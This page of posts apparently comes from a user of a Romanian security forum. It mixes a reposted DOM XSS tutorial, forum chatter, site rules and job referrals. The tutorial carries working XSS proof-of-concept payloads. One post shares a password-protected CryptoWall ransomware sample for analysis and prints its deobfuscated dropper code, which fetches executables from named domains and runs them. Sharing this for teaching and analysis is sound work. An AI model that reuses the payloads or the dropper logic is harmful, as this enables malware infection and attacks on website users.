Nytro

An Introduction to DOM XSS Published on February 10, 2016 By HollyGraceful on Web Application Security Document Object Model Based Cross-Site Scripting (DOM Based XSS) is a type of Cross-site Scripting where instead of the payloads being stored or reflected by the remote web server and appearing in the response HTML the payload is instead stored in the DOM and processed insecurely by JavaScript. For those unfamiliar with what the DOM is, a short and fairly untechnical overview is available here. The impact, and exploitation of DOM-XSS, is essentially the same as reflected or stored however the detection is a little different, as you can’t simply check the server responses and build up a payload. For example if you’re using Burp Suite for testing Burp doesn’t parse or execute JavaScript and therefore it won’t be too much help there. (It will however look for DOM-XSS through static analysis and pick up on issues such as location.hash ending up in document.write). This is the idea of “sinks” and “sources”, where a vulnerability may occur if an attacker is able to control a source and the data retreived makes it into a sink without filtering, validation or encoding. The data may be processed and changed in the centre as long as a payload can be snuck along too. Essentially we concentrate on areas where user input may find its way into potentially vulnerable functions. It may be useful to remember that Firefox can show the DOM-Source by highlighting an area of the page and selecting “View Selection Source”. Generally I will manually review JavaScript and try and link between areas of user input and potentially dangerous functions. Here I’ll try to demonstrate the concept through a real-world example found on a recent Penetration Test. Hopefully this will highlight the concepts as well as some of the difficulties in finding these issues: During a recent Penetration Test I can across an interesting piece of JavaScript which turned out to be vulnerable, so I’ve cleaned it up, anonymised it and present it here as a vulnerable example. In the actual application this was a collection of four functions being loaded from different locations and was a little more complex than what you see here, I’ve simply reduced the complexity so that it doesn’t distract too much from the general idea. The idea here was that I tied a source to a sink and that led to an exploit. The following code is similar to what I found during my Penetration Test: 1. <html><body> 2. <script> 3. function OnLoad() { 4. var foundFrag = get_fragment(); 5. return foundFrag; 6. } 7. 8. function get_fragment() { 9. var r4c='(.*?)'; 10. var results = location.hash.match('.*input=token('+r4c+');'); 11. 12. if(results){ 13. return (unescape (results[2])); 14. } else { 15. return null; 16. } 17. } 18. 19. display_session = OnLoad(); 20. document.write("Your session ID was: "+display_session+"<br><br>")</script> 21. An error occurred... 22. </body><html> First of all I noticed the function document.write() executing with a parameter containing get_fragment(). I traced document.write through display_session to OnLoad() which executes get_fragment() which takes input from the URL. In reality that link between user input and vulnerable function was a little more blurry, with some additional processing being done to “results”, however you can see the idea here. Through the application scripts we try and tie together user inputs and vulnerable functions. If we can get unfiltered user input into document.write() we can deface the web application or potentially steal confidential data. Location.hash is being used as input to that function so let’s start there because that’s user input (an attacker could craft a malicious link with a payload in the fragment). For those unfamiliar with JavaScript the line in question is number 10. It’s taking location.hash which is the contents of the URL after the “fragment”, that’s after the # at the end of the URL, such as: http://gracefulsecurity.com/example?#foobar It’s taking the word “foobar” from above and applying a Regular Expression to it. The expression looks for the string “input=token” anywhere in the fragment and reads from that string up to a semi-colon character (that’s what r4c is doing, it’s a capture group that captures any character using the multiple wildcard “.*”). Therefore in this case, if I wanted to execute a simple XSS proof-of-concept such as alert(1) I could play this in the URL fragment after the string input=token but before a semicolon like this: http://gracefulsecurity.com/example?#input=token<script>alert(1)</script>; With this, the script would find intput=token and read from there up to the semi-colon, then place that input within the document.write function and the following happens: A simple XSS proof-of-concept, here however you might thing that a more complex payload would not be possible as the application stops reading when it spots a semi-colon and so something as simple as alert(1);alert(2) would not be possible, however thanks to the use of unescape() on the returned data I can use a payload like this: http://gracefulsecurity.com/example?#input=token<script>alert(1)%3balert(2)</script>; Where I am replacing the ; character with its URI encoded equivalent! No I can write my malicious JavaScript payload and craft a link to send to a victim just like I would with standard reflected cross-site scripting! So all in all detection and payload generation is a little trickier usually, but the act of exploitation and the impact is just the same! Detection is harder because I can’t use a tool like Burp Suite to view the modified responses (as it’s all handled client site by the browser). However by using tools like firebox, by using the developer console, or by statically analysing the JavaScript we can still pick up on these issues simply. Remediation It’s worth noting that modern browsers have made steps to restrict the exploit-ability of issues like reflected XSS and DOM-Based XSS. However there are still things that can be done by developers. Generally speaking HTML Entity encoding none alphanumeric user input as it is rendered to the browser will effectively block an attackers ability to execute scripts in the malicious ways described above whilst preserving the functionality of the application. It’s not enough to block keywords such as “script” (and certainly alert!), it is more important to block the characters required to write effective JavaScript, such as: ( ) ; " ' I build on this idea in more detail within my article about Web Application Defence, which can befound here. Sursa: https://www.gracefulsecurity.com/an-introduction-to-dom-xss/

L-am gasit pe Twitter: Pentru cei care nu stiu: Acesta este un MALWARE (de fapt RANSOMEWARE, sau "virus"). Daca nu stiti ce e, nu e pentru voi. E pentru cei care vor sa il analizeze. Fisierul e atasat. Parola arhivei e "RST". CryptoWall.zip

Ca idee, se poate dezobfusca foarte usor. La final se poate vedea: "this[h91](n49);". E un apel de functie cu un anume parametru. Ce se intampla daca afisam acel parametru (n49)? Adica inlocuim "this[h91]" cu "document.write" si: var b = "yatrazone.com exquisitecorpse.co.nz.s74023.gridserver.com maineselectrealestate.com".split(" "); var ws = WScript.CreateObject("WScript.Shell"); var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+"302988"; var xo = WScript.CreateObject("MSXML2.XMLHTTP"); var xa = WScript.CreateObject("ADODB.Stream"); var ld = 0; for (var n=1; n<=3; n++) { for (var i=ld; i 1000) { dn = 1; xa.position = 0; xa.saveToFile(fn+n+".exe",2); try { ws.Run(fn+n+".exe",1,0); } catch (er) { }; }; xa.close(); }; if (dn == 1) { ld = i; break; }; } catch (er) { }; }; }; PS: Cred ca mizeria asta (cu WScript.Shell) merge doar pe IE6 maxim IE7.

https://www.gofundme.com/w8nvtk7d

Ia un AllView.

O sa punem la vot mai multe astfel de sugestii. Astfel, veti avea impresia ca e democratie

IPBoard te pune sa alegi: Reputation sau Like. Cred ca e de fapt aceeasi chestie.

Nu cred ca faci lucruri atat de nasoale incat sa fie nevoie sa treci prin foarte multe layere de anonimizare. Un VPS/VPN cu Tor cred ca este de ajuns.

VPN -> Tor -> VPS -> Tor -> VPN repetat de 2-3 ori! Asta mergand cu masca pe fata intr-un McDonalds si schimband adresa MAC! Apoi fugi in alt oras! Nu cred ca are rost sa mai spun ca trebuie sa iti faci alt buletin si cateva operatii estetice ulterior...

La naiba, v-ati dat seama... In caz ca nu va puteti da singuri seama care sunt eu din acea poza: Stiu, am facut putina burta, nu va mai luati de mine

Nu pot face nimic in legatura cu link-urile vechi, au alt ID... Nu am ce face. Sa vad daca pot gasi o legatura intre ele...

O sa luam in considerare, deocamdata ramane asa.

Iti face asa mereu, sau doar din cand in cand? E posibil sa fie de la serviciul lor de chat. In caz ca nu stiati, discutiile de pe chat trec pe la ei. O sa vad ce pot face in privinta asta. Dar e posibil ca din cauza asta sa nu mearga.

Se pot pune imagini pe chat? Nu stiam.

Am facut. Pe bune, l-am pus pe RST. A iesit un cacat. Erau o tona de probleme, nu merge nimic, se incarcau pagini si in 20 de secunde... Era o mizerie.

#include <stdio.h> int main() { puts("Hello, RST!"); return 0; } Pare ok, pacat ca e nasoala indentarea.

Dati-mi niste exemple. IPB are propriul imageproxy dar e posibil sa nu functioneze chiar perfect...

Acum mai apare? Si eu pateam la fel si nu mergea mesageria privata. Am scos acel plugin si pare ok

Nu stiu nimic legat de aia. Am ascuns link-urile pentru guests. A trebuit sa modific o expresie regulata dintr-un plugin rusesc si sa il traduc

[RO] Termeni si conditii - Administratorii acestui website nu isi asuma nicio responsabilitate pentru continutul acestui forum! Fiecare utilizator este responsabil pentru continutul creat! - Administratorii nu sunt responsabili pentru problemele aparute in urma folosirii informatiilor de pe acest website! - Administratorii acestui website nu isi asuma nicio responsabilitate pentru pagubele rezultate in urma vanzarii, cumpararii sau schimbului de bunuri sau servicii pe acest website! - Avem toleranta 0 pentru frauda sau informatii care faciliteaza frauda online sau bancara, inclusiv prin mesajele private (skimming, CC-uri, root-uri etc.). Orice abatere de la aceasta regula se pedepseste prin interzicerea permanenta pe website, iar datele voastre vor fi oferite organelor competente dac? ni se va cere acest lucru. De asemenea, administratorii isi rezerva dreptul de a interzice utilizatorilor accesul pe website in urma oricarei posibile activitati care pot fi legate de frauda online sau bancara. - Se interzice publicarea de continut ilegal sau fara drepturi de autor! Este interzisa publicarea de date cu caracter personal, conturi care nu va apartin, informatii de acces la diferite servere sau website-uri sau orice altceva care nu va apartine si care nu respecta legislatia in vigoare! - Acest website nu gazduieste fisiere fara drepturi de autor ci doar legaturi catre diferite servicii externe. Administratorii acestui website nu isi asuma responsabilitatea pentru continutul prezent pe servicii externe. Daca sunteti posesorii drepturilor de autor pentru informatii publicate pe acest website, luati legatura cu unul dintre administratori pentru eliminarea continutului. - Prin accesarea acestui website sunteti de acord cu termenii si conditiile si cu regulamentul acestui website! [RO] Avertisemente, interzicere temporara sau permanenta In urma abaterii de la regulile acestui forum, utilizatorii pot fi avertizati (warn) sau li se poate interzice accesul pe forum (ban) temporar sau permanent. Administratorii si moderatorii acestui website sunt cei care decid pedeapsele pentru incalcarea regulilor. Daca considerati ca pedeapsa (warn sau ban) nu este justificata, luati legatura cu unul dintre administratorii acestui website. Actiuni pentru care veti primi un avertisment (warn): - Off-topic - Daca va abateti de la tema de discutie a unui subiect - Post dublu - Nu faceti mai multe posturi consecutive - Post inutil - Nu potati doar de dragul de a posta ci doar daca aveti ceva util de spus - Redeschidere topic - Verificati daca ultimului post intr-un topic, daca nu s-a mai postat de cativa ani nu postati nici voi - Insultare membru - Fara atacuri la persoana sau injuraturi - Nume inadecvat - Pentru un topic, alegeti un titlu care sa rezume postul - Limbaj inadecvat - Respectati regulile gramaticale, fara sh, tz sau altceva, nu sunteti pe IRC - Link-uri cu referral - Fara adf.ly sau alte mizerii - Crearea unui cont pe forum doar pentru a cere invitatii pe trackere, alte forumuri, etc. - Altul: orice abatere care nu se incadreaza in aceste categorii Pentru multiple avertismente rezultatul poate fi banarea temporara sau permanenta, astfel: - pentru 3 avertismente - ban 5 zile - pentru 4 avertismente - ban 30 de zile - pentru 5 avertismente - ban permanent [RO] Reguli 1. Nu postati si nu cereti root-uri, vpn-uri, smtp-uri etc. 2. Oferiti credite si dati sursele originale. Daca veti copia un link sau un tutorial de pe alt site/forum/blog, oferiti credite autorului initial. 3. Unele categorii (ca Free Stuff sau RST Market) au regulament intern. Verifica daca exista un regulament sticky inainte de a posta intr-o anumita categorie. 4. Fiecare tutorial, program sau lucruri asemanatoare trebuie insotite de o descriere in romana sau engleza. Linkurile catre programe trebuie sa fie catre site-ul oficial al acelui program sau tutorial. 5. Publicarea datelor personale sau tentative de acest gen ale oricarui individ duce la ban permanent. 6. Nu cereti VIP, Moderator sau alte ranguri pentru ca nu le veti primi. Daca vom avea nevoie va vom cauta noi. 7. Un moderator/administrator are dreptul sa zboare pe oricine doreste de pe forum, cu atat mai mult daca consider? ca acea persoan? este inutila pentru forum. 8. Exista buton de report post. Nu atrageti aten?ia prin mesaje publice pentru ca veti primi avertisment. Eventual dati mesaj privat acelui utilizator. 9. Nu aveti voie sa faceti proiecte sau prezentari in numele RST fara acordul unuia dintre administratori. 10. Nu aveti voie sa injurati pe chat sau sa faceti atacuri la persoana. Nerespectarea acestei reguli duce la sanctionarea prin Kick si ulterior prin BAN pe chat. 11. Crearea a mai mult de 1 cont pe persoana duce automat la banarea tuturor conturilor. 12. Postarea de vulnerabilitati in site-uri care nu au un program bug-bounty si care nu ofera un cadru legal pentru raportarea vulnerabilitatilor este interzisa. Administratorii RST au dreptul de a modifica oricand Termenii si conditiile si Regulamentul acestui website fara o notificare in prealabil. [RO] Regulament categorii: Free stuff - Nu se accepta root-uri, smtp-uri, vps-uri, rdp-uri etc. care nu va apartin - Nu se accepta conturi sau acces la diferite servicii care nu va apartin RST Market - Nu se accepta vanzarea, cumpararea sau schimbul de date care faciliteteaza frauda online sau bancara - Nu se accepta vanzarea, cumpararea sau schimbul de root-uri, smtp-uri, vps-uri, rdp-uri etc. care nu va apartin - Nu se accepta vanzarea, cumpararea sau schimbul de conturi care nu va apartin [EN] Terms and conditions - The administrators of this website do not take any responsibility for the content of the website! Each user is responsible for the created content! - The administrators are not responsible on any problem resulted by using the information available on this website! - The administrators of this website do not take any responsibility for the loss resulted by selling, buying or exchanging information on this website! - We do no tolerate fraud or any information that facilitates online fraud or banking fraud, including by private messaging system (skimming, CCs, roots etc.)! Any abuse on this rule is punished with permanent ban on this website and your personal data will be offered to the authorities if they request us this. Also, the administrators of this forum are allowed to ban users for any activity that can be related to online fraud or banking fraud. - It is not permitted to create illegal content or without copyright! It is forbidden to publish private personal date, stolen accounts, access information to different websites or services that do not belong to you or any information that does not respect the legislation! - This website does not host files without copyright, it only hosts links to external service providers. The administrators of this website do not take the responsibility for the content available on external services. If you are the copyright folder for information provided on the website, please contact one of the administrators to remove the content. - By accessing this website you agree the terms and conditions and the rules of this website! [EN] Warnings, temporary and permanent ban reasons Not following the forum rules may result in warnings, temporary ban or permanent ban on this website. The administrators and the moderators of this website decide the punishment for each abuse of the rules. If you consider that the punishment is not correct, please contact one of the administrators of this website. You can be warned for the following actions: - Off-topic - if you deviate from the topic subject - Double post - If you have multiple consecutive posts - Useless post - If you post without any reason and the post is not useful to the topic subject - Reopen thread - Check the last post date on a thread and do not post there if it is very old - Insulted member - Do not attack and insult other members - Improper name - Please use descriptive thread subjects - Improper language - You are not on IRC, please be as correctly grammatical as possible - Referral links - Do not post adf.ly or other stupid referral links - Creating an account on the forum only to ask for invitations on trackers, other forums, etc. - Other - Any other abuse of the forum rules For multiple warnings, the result can be temporary or permanent ban: - for 3 warnings - ban 5 days - for 4 warnings - ban 30 days - for 5 warnings - permanent ban [EN] Rules 1. Do not post or request root, vps, smtp or anything else. 2. Specify the original sources for your posts when you post a tool or a tutorial from other website. 3. Some categories (such as Free stuff or RST Market) have internal rules. Follow that rules when you post in that categories. 4. Each tool or tutorial must contain at least a small description in English or Romanian. Links to programs must be links to the official site of those programs. 5. Publishing or trying to publish private personal information will result in permanent ban. 6. Do not request VIP or Moderator access, you will not get it. If we need you, we will search you. 7. A moderator or an administrator have the right to ban anyone on this forum if he considers that the user is useless for the forum. 8. There is a "Report" button, please use it, do not post to warn other users about their mistake. 9. You are not allowed to create tools or write articles in the name of RST without the approval of one of the administrators. 10. You are not allowed to attack or insult other persons on that chat and on the forum. 11. If you have more than one account you can be banned on all your accounts. 12. Posting vulnerabilities i websites that do not have a bug bounty program is forbidden. RST staff have the right to modify at any time the Terms and conditions and the rules of this forum without a notification. [EN] Category rules Free stuff: - It is forbidden to post or request root, vps, smtp or anything else that do not belong to you - It is forbidden to post accounts for different websites or services that do not belong to you RST Market: - It is forbidden to sell, buy or exchange data that facilitates online fraud or banking fraud - It is forbidden to sell, buy or exchange roots, vps, smtp, rdp or anything else that do not belong to you - It is forbidden to sell, buy or exchange accounts that do not belong to you

Salut, Dell angajeaza pe mai multe pozitii. O lista completa o gasiti aici: https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/search/3792178 Cateva job-uri selectate: - Principal Consultant, Penetration Testing - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/principal-consultant-penetration-testing-75285 - Information Security Risk Management Advisor - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/information-security-risk-management-advisor-78526 - Java Software Development Sr. Analyst - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/java-software-development-sr-analyst-80439 - Java Software Development Advisor - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/java-software-development-advisor-79300 - Senior Security Specialist - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/senior-security-specialist-77371 - Network Security - Firewall Auditor - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/network-security-firewall-auditor-75062 - Junior Linux Admin - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/junior-linux-admin-81076 - Level 2 Technical Support Analyst - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/level-2-technical-support-analyst-81957 - Windows System Administrator - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/windows-system-administrator-82417 - Software Testing Engineer - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/software-testing-engineer-82376 - Software Testing Jr. Engineer - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/software-testing-jr-engineer-82386 - McAfee ESM Security Advisor - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/mcafee-esm-security-advisor-81648 Note: 1. Link-urile sunt cu referral, aceasta e procedura interna de recomandare. Avantajul e ca totul se rezolva mult mai repede si va pot ajuta cu ce informatii aveti nevoie despre o anumita pozitie. 2. Nu cred ca se poate lucra remote, trebuie sa fiti in Bucuresti. Exista totusi posibilitatea de a se lucra (din cand in cand) de acasa, pentru anumite pozitii (program de noapte de exemplu) poate chiar mereu. Daca aveti o intrebare imi puteti trimite un PM. // Nytro

Atunci cred ca poti folosi proxy-uri publice, doar sa le verifici inainte sa vezi ca merg.

Salut, ce vrei sa faci cu ele? Daca vrei sa faci porcarii, sa stii ca nu sunt tocmai utile, sunt multe honeypot-uri. Cauta pe Google "proxy list" si gasesti cu tonele.

Done.

VIP Area era de forma, nu se posta mai nimic util acolo. Singurul lucru util pentru VIPi era acel Custom Title, care nu inteleg de ce era asa dorit... Deocamdata nu o sa fie nimic, o sa vedem pe parcurs.